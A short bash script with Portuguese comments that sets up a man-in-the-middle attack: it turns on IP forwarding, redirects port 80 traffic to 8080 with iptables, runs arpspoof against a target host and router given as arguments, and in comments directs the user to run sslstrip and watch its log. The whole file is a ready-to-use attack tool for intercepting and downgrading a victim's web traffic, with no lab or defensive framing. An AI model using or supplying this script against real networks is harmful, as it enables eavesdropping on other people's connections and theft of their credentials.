#!/bin/bash

if [ ! $1 ] || [ ! $2 ] || [ ! $3 ]; then
     echo 'Favor inserir os parâmetros [IP] [ROUTER] [INTERFACE]'
else
	sudo sysctl -w net.ipv4.ip_forward=1

	#redirecionando as requisicoes tcp da porta 80 para 8080
	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

	#abrindo a porta 8080 para aceitar as requisicoes
	iptables -I INPUT 1 -p tcp --dport 8080 -j ACCEPT

	#para iniciar o spoof
	arpspoof -i $3 -t $1 -r $2

	#iniciar strip com o comando: 
	#sslstrip -l 8080
	#depois da um tail no arquivo de log com: 
	#tail -f sslstrip.log
	#após o strip retornar o ip_forward para 0 com:
	#sudo sysctl -w net.ipv4.ip_forward=0

fi